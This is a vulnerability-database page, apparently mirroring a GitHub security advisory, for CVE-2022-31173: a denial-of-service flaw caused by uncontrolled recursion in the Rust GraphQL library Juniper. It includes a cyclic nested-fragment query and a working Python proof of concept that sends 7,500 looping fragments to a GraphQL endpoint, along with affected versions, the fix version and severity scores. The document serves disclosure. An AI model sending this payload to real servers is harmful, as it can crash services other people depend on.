Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-4rx6-g5vg-5f3j

Опубликовано: 29 июл. 2022
Источник: github
Github: Прошло ревью
CVSS3: 7.5

Описание

Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow

GraphQL behaviour

Nested fragment in GraphQL might be quite hard to handle depending on the implementation language. Some language support natively a max recursion depth. However, on most compiled languages, you should add a threshold of recursion.

# Infinite loop example query { ...a } fragment a on Query { ...b } fragment b on Query { ...a }

POC TLDR

With max_size being the number of nested fragment generated. At max_size=7500, it should instantly raise:

However, with a lower size, you will overflow the memory after some iterations.

Reproduction steps (Juniper)

git clone https://github.com/graphql-rust/juniper.git cd juniper

Save this POC as poc.py

import requests import time import json from itertools import permutations print('=== Fragments POC ===') url = 'http://localhost:8080/graphql' max_size = 7500 perms = [''.join(p) for p in permutations('abcefghijk')] perms = perms[:max_size] fragment_payloads = '' for i, perm in enumerate(perms): next_perm = perms[i+1] if i < max_size-1 else perms[0] fragment_payloads += f'fragment {perm} on Query' + '{' f'...{next_perm}' + '}' payload = {'query':'query{\n ...' + perms[0] + '\n}' + fragment_payloads,'variables':{},'operationName':None} headers = { 'Content-Type': 'application/json', } try: response = requests.request('POST', url, headers=headers, json=payload) print(response.text) except requests.exceptions.ConnectionError: print('Connection closed, POC worked.')
cargo run [in separate shell] python3 poc.py

Credits

@Escape-Technologies

@c3b5aw @MdotTIM @karimhreda

Ссылки

Пакеты

Наименование

juniper

rust
Затронутые версииВерсия исправления

< 0.15.10

0.15.10

EPSS

Процентиль: 69%
0.00615
Низкий

7.5 High

CVSS3

CVE ID

CVE-2022-31173

Дефекты

CWE-400
CWE-674

Связанные уязвимости

nvd логотип

CVE-2022-31173

CVSS3: 7.5
nvd
больше 3 лет назад

Juniper is a GraphQL server library for Rust. Affected versions of Juniper are vulnerable to uncontrolled recursion resulting in a program crash. This issue has been addressed in version 0.15.10. Users are advised to upgrade. Users unable to upgrade should limit the recursion depth manually.

fstec логотип

BDU:2022-06392

CVSS3: 7.5
fstec
больше 3 лет назад

Уязвимость серверной библиотеки Juniper среды выполнения запросов GraphQL, связанная с неконтролируемой рекурсией, позволяющая нарушителю вызвать отказ в обслуживании

EPSS

Процентиль: 69%
0.00615
Низкий

7.5 High

CVSS3

CVE ID

CVE-2022-31173

Дефекты

CWE-400
CWE-674